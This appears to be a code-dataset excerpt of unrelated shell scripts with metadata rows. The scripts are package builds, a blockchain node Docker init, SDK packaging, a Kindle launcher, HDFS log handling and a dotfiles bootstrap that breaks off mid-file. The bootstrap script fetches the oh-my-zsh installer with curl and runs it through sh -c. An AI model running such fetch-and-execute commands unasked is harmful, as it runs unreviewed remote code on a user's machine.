license=('LGPL-2.1')
url="http://readthedocs.org/docs/nose/"
makedepends=("${MINGW_PACKAGE_PREFIX}-python2-setuptools" "${MINGW_PACKAGE_PREFIX}-python3-setuptools")
source=("http://pypi.python.org/packages/source/n/nose/nose-${pkgver}.tar.gz")
md5sums=('42776061bf5206670cb819176dc78654')
build() {
cd "$srcdir/nose-$pkgver"
sed -i -e "s:man/man1:share/man/man1:g" setup.py
cd "$srcdir"
rm -rf python{2,3}-build
for builddir in python{2,3}-build; do
cp -r nose-$pkgver $builddir
pushd $builddir
${MINGW_PREFIX}/bin/${builddir%-build} setup.py build
popd
done
}
package_python3-nose() {
depends=("${MINGW_PACKAGE_PREFIX}-python3-setuptools")
pushd ${MINGW_PREFIX} > /dev/null
local _mingw_prefix=`pwd -W`
popd > /dev/null
cd "$srcdir/python3-build"
MSYS2_ARG_CONV_EXCL="--prefix=;--install-scripts=;--install-platlib=" \
${MINGW_PREFIX}/bin/python3 setup.py install --prefix=${MINGW_PREFIX} --root="$pkgdir" -O1
rm -f ${pkgdir}${MINGW_PREFIX}/bin/nosetests{.exe,-script.py,.exe.manifest}
# fix python command in files
for _f in "${pkgdir}${MINGW_PREFIX}"/bin/*.py; do
sed -e "s|${_mingw_prefix}|${MINGW_PREFIX}|g" -i ${_f}
done
rm -rf "${pkgdir}${MINGW_PREFIX}/share"
}
package_python2-nose() {
depends=("${MINGW_PACKAGE_PREFIX}-python2-setuptools")
pushd ${MINGW_PREFIX} > /dev/null
local _mingw_prefix=`pwd -W`
popd > /dev/null
cd "$srcdir/python2-build"
MSYS2_ARG_CONV_EXCL="--prefix=;--install-scripts=;--install-platlib=" \
${MINGW_PREFIX}/bin/python2 setup.py install --prefix=${MINGW_PREFIX} --root="$pkgdir" -O1
# fix python command in files
for _f in "${pkgdir}${MINGW_PREFIX}"/bin/*.py; do
sed -e "s|${_mingw_prefix}|${MINGW_PREFIX}|g" -i ${_f}
done
}
package_mingw-w64-i686-python2-nose() {
install=${_realname}2-${CARCH}.install
package_python2-nose
}
package_mingw-w64-i686-python3-nose() {
install=${_realname}3-${CARCH}.install
package_python3-nose
}
package_mingw-w64-x86_64-python2-nose() {
install=${_realname}2-${CARCH}.install
package_python2-nose
}
package_mingw-w64-x86_64-python3-nose() {
install=${_realname}3-${CARCH}.install
package_python3-nose
}
| true
|
a417208666120b51560276dadcbd311cf3d817ba
|
Shell
|
unik-name/unn-core
|
/docker/uns-init.sh
|
UTF-8
| 3,589
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
NETWORK=${UNS_NET:-livenet} # default livenet
TOKEN="uns"
echo "network : $NETWORK"
echo "token : $TOKEN"
if [ "$NETWORK" == "livenet" ]; then
unlink /opt/uns/packages/core/bin/config/livenet/sandbox-plugins.js
cp /opt/uns/packages/core/bin/config/sandbox/plugins.js /opt/uns/packages/core/bin/config/livenet/sandbox-plugins.js
fi
CONFIG_DIR=~/.config/uns-core/$NETWORK
# publish default config (from sources) to $CONFIG_DIR
uns config:publish --network=$NETWORK --token $TOKEN
# Backward compatibility (remove later)
if [ -n "$DB_HOST" ]; then
export CORE_DB_HOST=$DB_HOST
echo "warning: 'DB_HOST' environment variable will be deprecated soon. Use 'CORE_DB_HOST' instead."
fi
if [ -n "$DB_PORT" ]; then
export CORE_DB_PORT=$DB_PORT
echo "warning: 'DB_PORT' environment variable will be deprecated soon. Use 'CORE_DB_PORT' instead."
fi
if [ -n "$DB_USER" ]; then
export CORE_DB_USER=$DB_USER
echo "warning: 'DB_USER' environment variable will be deprecated soon. Use 'CORE_DB_USER' instead."
fi
if [ -n "$DB_PASSWORD" ]; then
export CORE_DB_PASSWORD=$DB_PASSWORD
echo "warning: 'DB_PASSWORD' environment variable will be deprecated soon. Use 'CORE_DB_PASSWORD' instead."
fi
if [ -n "$DB_DATABASE" ]; then
export CORE_DB_DATABASE=$DB_DATABASE
echo "warning: 'DB_DATABASE' environment variable will be deprecated soon. Use 'CORE_DB_DATABASE' instead."
fi
# Parse file (first parameter) and replace in file environment variable value of already exported environment variables.
seek_and_replace(){
while IFS= read -r line; do # Read each file line
if [ ! ${#line} -eq "0" ]; then # Skip empty lines
KEY=$(echo $line | sed 's/^\(.*\)=.*$/\1/') # Environment variable key to seek
ENV_LINE=$(env | grep ^$KEY=) # Seek environment variable above in exported variables
if [ ! -z $ENV_LINE ]; then # If current environment variable is exported
VALUE=$(echo $ENV_LINE | sed 's/^'$KEY'=\(.*\)$/\1/') # Get value of exported environment variable
sed -i "s/^\($KEY=\).*$/\1$VALUE/g" $1 # Replace in file, value of current variable by exported value
echo "Found external variable $KEY. Replace in config file to value '$VALUE'"
fi
fi
done < $1
}
seek_and_replace $CONFIG_DIR/.env
echo "using P2P port: $CORE_P2P_PORT"
if [[ -n "${BOOTSTRAP}" ]]; then
echo "bootstrap mode"
NETWORK_START="--networkStart"
fi
if [[ -n "${BOOTNODE}" ]]; then
echo "uses bootnode : ${BOOTNODE}"
IP=$(getent hosts $BOOTNODE | cut -d ' ' -f 1)
if [[ -n "${IP}" ]]; then
PEER_FILE=$CONFIG_DIR/peers.json
echo $(jq --arg ip $IP --arg port $CORE_P2P_PORT '.list += [{"ip": $ip,"port":"$port"}]' $PEER_FILE ) > $PEER_FILE
fi
echo "wait bootnode to be up and forging ($STARTING_DELAY)"
sleep $STARTING_DELAY
fi
FORGER=false # No forger by default
if [[ -n "${FORGERS_SECRET}" ]]; then
echo "setting forgers secret from `FORGERS_SECRET` environment variable (MULTI FORGERS MODE)"
echo "{\"secrets\": [$FORGERS_SECRET]}" > $CONFIG_DIR/delegates.json
FORGER=true
elif [[ -n "${FORGER_SECRET}" ]]; then
echo "setting forger secret from `FORGER_SECRET`environment variable (SINGLE FORGER MODE)"
uns config:forger:bip39 --bip39 "$FORGER_SECRET" --token $TOKEN
FORGER=true
else
echo "No forger configured. Only relay node will be started."
fi
# Run
if [ "$FORGER" = true ] ; then
echo "Starting full node (relay + forger)"
uns core:run --network=$NETWORK $NETWORK_START --token $TOKEN
else
echo "Starting relay node"
uns relay:run --network=$NETWORK $NETWORK_START --token $TOKEN
fi
| true
|
50c7c3abaa59d8ace68419ce2bdf964db7c4a32b
|
Shell
|
TessHuelskamp/.myconf
|
/bin/copyloop
|
UTF-8
| 1,001
| 4.15625
| 4
|
[] |
no_license
|
#!/bin/bash
# place all lines of a file into copy paste buffer one by one
# I've wanted to do this a couple times, ¯\_(ツ)_/¯, so I wrote this
# only works on mac
# (I haven't learned how to mess with the paste buffer on other systems)
# should, in theory, be doable
# grab file name from command line args
# not dealing with opts or pipes for now...
if [[ -z "$1" ]]; then
echo Usage: $0 FILENAME >&2
exit 1
else
filename="$1"
fi
if [[ ! -f "$filename" ]]; then
echo $filename isnt a file. >&2
exit
fi
# the read -u 3 and 3< syntax allows the inner body of the loop to read from
# standard in (0). Without this the file will clobber the second readline. 3
# can be replaced with any other valid descriptor (0, 1, and 2 are taken by
# stdin, stdout, and stderror)
while read -u 3 line; do
#direct file to copy paste buffer and display on screen
echo $line | pbcopy
echo -n "$line"
#wait for user to hit enter button
read enter
done 3<"$filename"
| true
|
7b392340d6bd3824451228f1f29662e547bf9b00
|
Shell
|
ggerade/_OLD_FleksySDK-compiled
|
/Scripts/buildReleaseArchive.sh
|
UTF-8
| 4,784
| 3.828125
| 4
|
[] |
no_license
|
#!/bin/sh
# If any command fails, cause the script to fail and exit with non-zero status.
set -e
# If any variable is used but unset, cause the script to fail and exit with non-zero status.
set -u
errorHandler () {
errorCode=$?
echo "$0:${BASH_LINENO[0]} error: Command failed: '$BASH_COMMAND'"
exit $errorCode
}
trap errorHandler ERR
function canonpath ()
{
echo $(cd $(dirname "$1"); pwd -P)/$(basename "$1")
}
FLEKSYSDK_COMPILED_SCRIPT_PATH=`canonpath $0`
FLEKSYSDK_COMPILED_SCRIPT_NAME=$(basename "${FLEKSYSDK_COMPILED_SCRIPT_PATH}")
if [[ ! "${FLEKSYSDK_COMPILED_SCRIPT_PATH}" =~ \/Scripts\/${FLEKSYSDK_COMPILED_SCRIPT_NAME} ]]; then
echo "Expected the scripts executable path to end in 'Scripts/${FLEKSYSDK_COMPILED_SCRIPT_NAME}'."
exit 1
fi
FLEKSYSDK_COMPILED_ROOT_DIR="${FLEKSYSDK_COMPILED_SCRIPT_PATH/\/Scripts\/${FLEKSYSDK_COMPILED_SCRIPT_NAME}//}"
FLEKSYSDK_COMPILED_SCRIPTS_DIR="${FLEKSYSDK_COMPILED_ROOT_DIR}/Scripts"
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo "Building FleksySDK archive..."
FLEKSYSDK_COMPILED_BUILD_DIR="${FLEKSYSDK_COMPILED_ROOT_DIR}/build"
FLEKSYSDK_COMPILED_STAGE_DIR="${FLEKSYSDK_COMPILED_BUILD_DIR}/stage"
rm -rf "${FLEKSYSDK_COMPILED_BUILD_DIR}"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}"
mkdir -p "${FLEKSYSDK_COMPILED_BUILD_DIR}"
mkdir -p "${FLEKSYSDK_COMPILED_STAGE_DIR}"
echo ""
echo "Staging Android..."
rsync -a --include='lib*.so' --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/Android/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING/Release" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib"
rsync -a --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --exclude='Release' --exclude='Debug' "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib/"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/Android/lib_STAGING"
echo ""
echo "Staging iOS..."
rsync -a --include='lib*.a' --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/ios/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib" "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib_STAGING"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib_STAGING/Release" "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib_STAGING"
cd "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib"
for FLEKSYSDK_COMPILED_LIB in lib*.a
do
echo "Stripping debug symbols from iOS lib : '${FLEKSYSDK_COMPILED_LIB}'..."
/usr/bin/strip -S "${FLEKSYSDK_COMPILED_LIB}" 2>&1 | perl -e 'while(<>) { s/^\/usr\/bin\/strip: input object file stripped: (.*?)libFleksyStatic\.a\(FLFile\.o\) \(for architecture [^\)]+\)\n$//; print $_; }'
echo "Verifing expected architectures in iOS lib: '${FLEKSYSDK_COMPILED_LIB}'..."
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch i386
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch armv7
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch armv7s
done
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo ""
echo "Staging OSX..."
rsync -a --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/osx/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib" "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib_STAGING"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib_STAGING/Release" "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib_STAGING"
cd "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib"
for FLEKSYSDK_COMPILED_LIB in *.dylib
do
echo "Stripping debug symbols from OSX lib : '${FLEKSYSDK_COMPILED_LIB}'..."
/usr/bin/strip -S "${FLEKSYSDK_COMPILED_LIB}"
echo "Verifing expected architectures in OSX lib: '${FLEKSYSDK_COMPILED_LIB}'..."
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch i386
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch x86_64
done
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo ""
echo "Staging samples..."
mkdir -p "${FLEKSYSDK_COMPILED_STAGE_DIR}/samples"
rsync -a --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/samples/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/samples/"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/samples/NOKIA-FleksySample2.zip"
echo ""
echo "Creating FleksySDK archive..."
mv "${FLEKSYSDK_COMPILED_BUILD_DIR}/stage" "${FLEKSYSDK_COMPILED_BUILD_DIR}/FleksySDK"
cd "${FLEKSYSDK_COMPILED_BUILD_DIR}"
/usr/bin/tar czf FleksySDK.tar.gz FleksySDK
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo ""
echo "Finished!"
echo ""
echo "FleksySDK archive: 'build/FleksySDK.tar.gz'"
| true
|
9ab05c1d2c25cc2c309c610cdf334f0a31b3d56e
|
Shell
|
GBert/railroad
|
/mrsystem/src/client_gpios88/startmrgpios88
|
UTF-8
| 412
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
GPIO_S88_KEY=gpio_s88
GPIO_S88_START=startmrgpios88
MRSYSTEM_CFG_FILE=/etc/mrsystem
MRSTART_CFG_FILE=/etc/mrstart
GPIO_S88_PARAM=`fgrep $GPIO_S88_KEY $MRSYSTEM_CFG_FILE | cut -f 2 -d "\""`
GPIO_S88_START=`fgrep $GPIO_S88_START MRSTART_CFG_FILE | cut -f 2 -d "\""`
if [ "x$GPIO_S88_START" = xstop" ] ; then
start-stop-daemon --start --background --exec /usr/local/bin/mrgpios88 -- $GPIO_S88_PARAM
fi
| true
|
415ed3b1b9bcbdbceeb3b72418ef4da47a49c20b
|
Shell
|
gemlongman/MyNote
|
/sh/run-models.sh
|
UTF-8
| 2,896
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/gy/usr/Linux/64/gcc7/lib
MODEL_FOLD=./models
# /home/gy/share/workfile/shapnet/ShapeNetSemv0
# ./models
BIN=./scan_prediction
ICP_DIR=./shn_icp
SPHERE=./sphere-coarse.binary.obj
ReportFile=./report.txt
LOG_FILE=log.txt
OBJ=$1
function sum(){
input=($*)
summary=0.0
# echo "${input[*]}"
for i in ${input[*]} ; do
# echo "i==${i}"
summary=$(echo "$summary+$i"|bc)
done
echo $summary
# return summary
}
if [ ! -z "$1" ]; then
rm -rf $OBJ
mkdir $OBJ
LOG_FILE=$OBJ/log.txt
date 2>&1 | tee $LOG_FILE
printf '***** start to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOG_FILE
$BIN icp_dir=$ICP_DIR stddev=0 angle_thd=0.4 normal_method=3 weight_method=3 predict_method=9 noise=0 obj=$MODEL_FOLD/$OBJ.norm.binary.obj sphere=$SPHERE itr=50 prefix=$OBJ/$OBJ. 2>&1 | tee -a $LOG_FILE
printf '***** finish to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOF_FILE
date 2>&1 | tee -a $LOG_FILE
exit
fi
# rm -rf ./Output
echo "" > $ReportFile
for d in $MODEL_FOLD/*.obj ; do
OBJfile=$d
# echo "OBJfile:$OBJfile"
OBJ=$(echo ${OBJfile##*/})
OBJ=$(echo ${OBJ%%.*})
# echo "file:$OBJ"
nMethod=3
wMethod=3
pMethod=9
Noise=0.1
OBJ_dir=Output/$OBJ$nMethod$wMethod$pMethod$Noise
LOG_FILE=$OBJ_dir/log.txt
mkdir -p $OBJ_dir
StartTime=$(date +%s.%N)
# date 2>&1 | tee $LOG_FILE
# printf '***** start to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOG_FILE
# #prefix : belong output file
# $BIN icp_dir=$ICP_DIR stddev=0 normal_method=$nMethod weight_method=3 predict_method=$pMethod noise=$Noise obj=$OBJfile sphere=$SPHERE itr=50 prefix=$OBJ_dir/$OBJ. 2>&1 | tee -a $LOG_FILE
# printf '***** finish to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOF_FILE
# date 2>&1 | tee -a $LOG_FILE
Endtime=$(date +%s.%N)
start_s=$(echo $StartTime | cut -d '.' -f 1)
start_ns=$(echo $StartTime | cut -d '.' -f 2)
end_s=$(echo $Endtime | cut -d '.' -f 1)
end_ns=$(echo $Endtime | cut -d '.' -f 2)
time=$(( ( 10#$end_s - 10#$start_s ) * 1000 + ( 10#$end_ns / 1000000 - 10#$start_ns / 1000000 ) ))
iterations=` grep "Terminate at iteration:" $LOG_FILE`
iterations=${iterations##*"Terminate at iteration: "}
coverateRate=` grep "coverate rate" $LOG_FILE | grep -Eo '[01].?[0-9]*'`
ARRcoverateRate=($coverateRate)
# iterations == exper ${#ARRcoverateRate[@]} - 1
lastcoverateRate=${ARRcoverateRate[${iterations}]}
predictionCost=` grep "prediction cost:" $LOG_FILE | grep -Eo '[0-9]+\.[0-9]*' `
predictionCost=$(sum "$predictionCost")
printf "$OBJ $nMethod $wMethod $pMethod $Noise \t iterations $iterations \t coverateRate ${lastcoverateRate} \t predictionCost $predictionCost\t $time ms \n" >> $ReportFile
done
| true
|
2abf3bd481771aa3b601034ba60af3b2cf18d110
|
Shell
|
jiedo/coolreader-kindle-qt
|
/dist-kt/cr3/cr3.sh
|
UTF-8
| 1,239
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/sh
if [ -z "$1" ] # No argument passed?
then
echo "Usage: qoqt.sh 'executable_file_name'" ;
return 1
fi
SAVE_DIR=`pwd`
cd /mnt/us/cr3
if [ ! -f "$1" ] # Check if file exists and it is a regular one
then
echo "goqt: "$1" -- regular file does not exist." ;
exit 1
fi
if [ ! -x "$1" ]
then
echo "goqt: "$1" -- not an executable file." ;
exit 1
fi
if [ ! -z `pidof $1` ]
then
echo "goqt: "$1" -- already running." ;
# wake up, Neo
kill -SIGUSR1 `pidof $1`
exit 0
fi
export LD_LIBRARY_PATH=/mnt/us/qtKindle/lib:`pwd`/lib
source /etc/upstart/functions
source /etc/upstart/blanket_functions
f_blanket_unload_module ad_screensaver
f_blanket_unload_module ad_screensaver_active
f_blanket_load_module screensaver
# hide Xorg windows
./ktsuspend.sh 0
export QT_PLUGIN_PATH=/mnt/us/qtKindle/plugins
export QT_QWS_FONTDIR=/mnt/us/qtKindle/lib/fonts
export QWS_MOUSE_PROTO=KindleTS
export QWS_KEYBOARD=none
export QWS_DISPLAY=QKindleFb
echo "./$1 -qws"
./"$1" -qws
cd $SAVE_DIR
# return to home, comment for returning back to runner if you have other commands there
lipc-set-prop com.lab126.appmgrd start app://com.lab126.booklet.home
# restore Xorg windows
killall -CONT awesome
./ktresume.sh 0
| true
|
485da22197d9d2c029c20619369a1ab12b7c64b0
|
Shell
|
mionsan/Centos
|
/linux/zabbix/chk_innodb.sh
|
UTF-8
| 1,211
| 3.09375
| 3
|
[] |
no_license
|
#1/bin/bash
case $1 in
total)
echo "SELECT (PagesTotal*PageSize) DataMB FROM (SELECT variable_value PagesTotal FROM information_schema.global_status WHERE variable_name='INNODB_BUFFER_POOL_PAGES_TOTAL') A, (SELECT variable_value PageSize FROM information_schema.global_status WHERE variable_name='Innodb_page_size') B;" | HOME=/var/lib/zabbix mysql -N
;;
used)
echo "SELECT (PagesData*PageSize) DataMB FROM (SELECT variable_value PagesData FROM information_schema.global_status WHERE variable_name='INNODB_BUFFER_POOL_PAGES_DATA') A, (SELECT variable_value PageSize FROM information_schema.global_status WHERE variable_name='Innodb_page_size') B;" | HOME=/var/lib/zabbix mysql -N
;;
%used)
echo "SELECT (PagesData*100)/PagesTotal FROM (SELECT variable_value PagesData FROM information_schema.global_status WHERE variable_name='Innodb_buffer_pool_pages_data') A, (SELECT variable_value PagesTotal FROM information_schema.global_status WHERE variable_name='Innodb_buffer_pool_pages_total') B;" | HOME=/var/lib/zabbix mysql -N
;;
hitrate)
x=`echo "show engine innodb status\G;" | HOME=/var/lib/zabbix mysql -N | grep "Buffer pool hit rate" | awk '{print $5}'`
hit=$(echo $x/10 | bc)
echo $hit
esac
| true
|
9e00992e00d7f71c9afa1bda16614a42d7714da0
|
Shell
|
frankielivada22/Rchat
|
/Rchat/StartChatServer/startserver.sh
|
UTF-8
| 2,765
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
# Colours
lgreen="\e[92m"
lred="\e[91m"
nc="\e[39m"
lyellow="\e[1;33m"
issslon=0
function exitprogram()
{
# This function exits the scripts using the trap command
echo ""
echo -e $lgreen"Aight bet..."
echo -e $lred"cya soon XD"
exit 0
}
function checkroot()
{
# This function checks to see if the user is root or running script as root and if not it closes
if [ $(id -u) != "0" ]; then
echo ""
echo You need to be root to run this script...
echo Please start R.Deauth with [sudo ./start.sh]
exit
else
echo YAY your root user!
sleep 1
clear
fi
}
function netcatinstalled()
{
# This function checks to see if all the requierd tools are installed and if not installs them for the user
nmaptool=`which nmap`
if [[ "$?" != "0" ]]; then
echo -e $lred"Nmap not found need to install..."
echo -e $lgreen""
read -p "Would you like to install Nmap? (y / n): " installnmap
if [[ $installnmap == "y" ]]; then
echo "Installing nmap"
sudo apt-get update
sudo apt-get upgrade
sudo apt-get nmap
fi
if [[ $installnmap == "n" ]]; then
echo -e $lgreen"You need nmap..."
exit 0
fi
fi
ncattool=`which ncat`
if [[ "$?" != "0" ]]; then
echo -e $lred"Ncat not found need to install..."
echo -e $lgreen""
read -p "Would you like to install Ncat? (y / n): " installncat
if [[ $installncat == "y" ]]; then
echo "Installing ncat"
sudo apt-get update
sudo apt-get upgrade
sudo apt-get ncat
fi
if [[ $installnmap == "n" ]]; then
echo -e $lgreen"You need Ncat..."
exit 0
fi
fi
}
#Running 3 of the functions
trap exitprogram EXIT
checkroot
netcatinstalled
while :
do
# The main menu
clear
echo -e $lgreen"Welcome..."
echo "encryption=$issslon"
echo "1) Start $chattype chat"
echo ""
echo "2) Enable/Disable encryption"
echo ""
echo "e) Exit"
echo ""
read -p "-->> " menu1
if [[ $menu1 == "1" ]]; then
if [[ $issslon == "1" ]]; then # Checks to see if encryption needs to be enabled
while :
do
echo ""
echo -e $lgreen"Chat started: "
ncat -v -p 8888 --listen --ssl --broker -k #runs script with ssl encryption enabled
echo -e $lred"something went wrong..."
echo "restarting"
done
fi
if [[ $issslon == "0" ]]; then
while :
do
echo ""
echo -e $lgreen"Chat started: "
ncat -k -l -p 8888 --broker #runs script with ssl encryption disabled
echo -e $lred"something went wrong..."
echo "restarting"
done
fi
fi
if [[ $menu1 == "2" ]]; then
if [[ $issslon == "0" ]]; then # Enables encryption
echo "Enableing encryption..."
issslon=1
sleep 2
else # Disables encryption
echo "Disableing encryption..."
issslon=0
sleep 2
fi
fi
if [[ $menu1 == "e" ]]; then # Exits script
exit 0
fi
done
| true
|
e554940d12e33093eaa8de1170dba09561b75fc5
|
Shell
|
crttcr/working-examples
|
/git/checkout.sh
|
UTF-8
| 206
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
## [Merge]
##
## Checkout the version of "file.a" from either
## the current branch (ours) or the branch being
## merged into the current branch (theirs)
##
git checkout --{ours,theirs} file.a
| true
|
3781f62dd5b7efbd6e2c3dbf9cf5c59cf6d5a803
|
Shell
|
rainly/scripts-1
|
/behavior2hdfs.sh
|
UTF-8
| 1,255
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
## location: 10,dest=/data/crontab,owner=weiguo:sysadmin,mode=755
#dump all online logs to hdfs
# 将行为日志导 入到HDFS
## 2015-08-04
## 日志已经实时存储到10.1.1.60节点上
## 因此该脚本仅用来检查数据是否已经保存在
HDFS_BASEDIR="/backup/behaviour"
LOCAL_BASEDIR="/logs/bi_exp"
if [ -z $1 ];then
CURR_DAY=$(date -d "1 days ago" +"%Y-%m-%d")
else
CURR_DAY=$(date -d "$1" +"%Y-%m-%d")
fi
hdfs dfs -test -d /backup/behaviour/app_action/$CURR_DAY
if [ $? -eq 0 ];then
echo "data has exists"
exit 0
else
echo "data has not exists"
exit 1
fi
cd $LOCAL_BASEDIR/$CURR_DAY || exit 1
#first compress all log file
lzop -U *.log
#rsync -av rsync://211.151.151.237/behaviour/\*.${CURR_DAY}.lzo $LOGS_DIR/ 2>/tmp/rsync_behaviour.log
#rsync -av /tmp/2014-07-09/*.${CURR_DAY}.gz $LOGS_DIR/ 2>/tmp/rsync_behaviour.log
for f in *.lzo
do
#break filename into 4 parts ,filename is such as app_action-info-211.151.151.237.log.lzo
method=$(echo $f |cut -d- -f1)
hdfsdir=${HDFS_BASEDIR}/${method}/${CURR_DAY}
hdfs dfs -mkdir -p ${hdfsdir}
hdfs dfs -moveFromLocal $f ${hdfsdir}/
#hadoop jar /usr/lib/hadoop/lib/hadoop-lzo-0.6.0.jar com.hadoop.compression.lzo.LzoIndexer ${hdfsdir}/
done
| true
|
857521b064f32201c3f4eecaa91a768f861e2421
|
Shell
|
andyuk/animation-tests
|
/www/images/gen.sh
|
UTF-8
| 292
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
# sh gen.sh 100x100 100
# sh gen.sh 400x400 400
# sh gen.sh 768x768 768
# sh gen.sh 1024x768 1024
dimensions=$1
outputDir=$2
for i in `seq 1 100`; do
`convert -size $dimensions -gravity center -background lightblue -fill black -pointsize 72 label:$i $outputDir/test$i.png`
done
| true
|
f33fa1b1aaab87c5428ead04ba3d49ca818e5e02
|
Shell
|
oznogon/bygfoot
|
/bfscript/trunk/bfgetpot
|
UTF-8
| 216
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
. scripts.cfg
pushd $bygfoot_source
xgettext -c -d bygfoot -k_ --force-po -f po/POTFILES.in
mv bygfoot.po po/bygfoot.pot
pushd po
for i in *po; do
msgmerge -s -U $i bygfoot.pot
msgfmt -c $i
done
| true
|
54545978ba5cdded0d17b3cfd1974273ebec6fc3
|
Shell
|
jacoborus/dotfiles
|
/bootstrap.sh
|
UTF-8
| 4,056
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
# list of files to symlink and backup in homedir
FILES=".bashrc .tmux.conf .zshrc"
# list of files to backup in vim directory
VIMFILES="init.vim coc-settings.json general.vim plugin.vim plug.vim status.vim"
# list of files to symlink in vim directory
VIMINITFILES="plug.vim general.vim plugins.vim status.vim"
DOTDIR=$(readlink -f $(dirname "$0")) # dotfiles directory
TODAY="$(date +%Y-%m-%d_%H-%M-%S)"
BACKUPFOLDER="$HOME/dotfiles_old/$TODAY"
VIMDIR="$HOME/.config/nvim"
THEMESFOLDER=$HOME/.oh-my-zsh/themes
command_exists() {
command -v "$@" >/dev/null 2>&1
}
function createBackup() {
local ORIGIN="$1/$2"
if [ -e $ORIGIN ]; then
local DESTINATION="$BACKUPFOLDER/$2"
echo "'$ORIGIN' => '$DESTINATION'"
mkdir -p $BACKUPFOLDER
mv $ORIGIN $DESTINATION
[ -e $ORIGIN ] && rm -y $ORIGIN
fi
}
function createSymlink() {
local ORIGIN="$2/$1"
local DESTINATION="$3"
ln -s -v $ORIGIN $DESTINATION
}
function installVimplug() {
echo -e "\e[34mInstalling vim-plug\e[0m"
sh -c 'curl -fLo $HOME/.config/nvim/site/autoload/plug.vim --create-dirs \
https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim' &&
echo 'vim-plug ok'
}
function installOhMyZsh() {
echo -e "\e[34mInstalling ZSH plugin manager (OhMyZsh)...\e[0m"
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" &&
echo 'ok'
}
function installDotfiles() {
# Move old files to backup folder
echo -e "\e[34mMoving old files to backup folder...\e[0m"
for file in $FILES; do
createBackup $HOME $file
done
for file in $VIMFILES; do
createBackup $VIMDIR $file
done
createBackup $THEMESFOLDER adesis.zsh-theme
createBackup $THEMESFOLDER rush.zsh-theme
# Create sylinks
echo -e "\e[34mCreating symlinks...\e[0m"
createSymlink '.bashrc' $DOTDIR/sh $HOME
createSymlink '.zshrc' $DOTDIR/sh $HOME
createSymlink '.tmux.conf' $DOTDIR/tmux $HOME
createSymlink 'adesis.zsh-theme' $DOTDIR/sh $THEMESFOLDER
createSymlink 'rush.zsh-theme' $DOTDIR/sh $THEMESFOLDER
mkdir -p $VIMDIR
createSymlink 'coc-settings.json' $DOTDIR/vim $VIMDIR
# Generate init.vim file
echo -e "\e[34mCreating init.vim file...\e[0m"
local INITVIM=""
for file in $VIMINITFILES; do
INITVIM="$INITVIM\nso $DOTDIR/vim/$file"
done
echo -e "$INITVIM" >$VIMDIR/init.vim
}
function installBasicSoftware() {
echo -e "\e[34mInstalling basic software\e[0m"
if command_exists apt; then
echo "apt found! installing basic software"
sudo apt install \
git-extras \
gpick \
inkscape \
jq \
luarocks \
meld \
neovim \
p7zip-full \
ripgrep \
saidar \
silversearcher-ag \
tmux \
tree \
whois \
xclip \
xsel
zsh \
exit
elif command_exists dnf; then
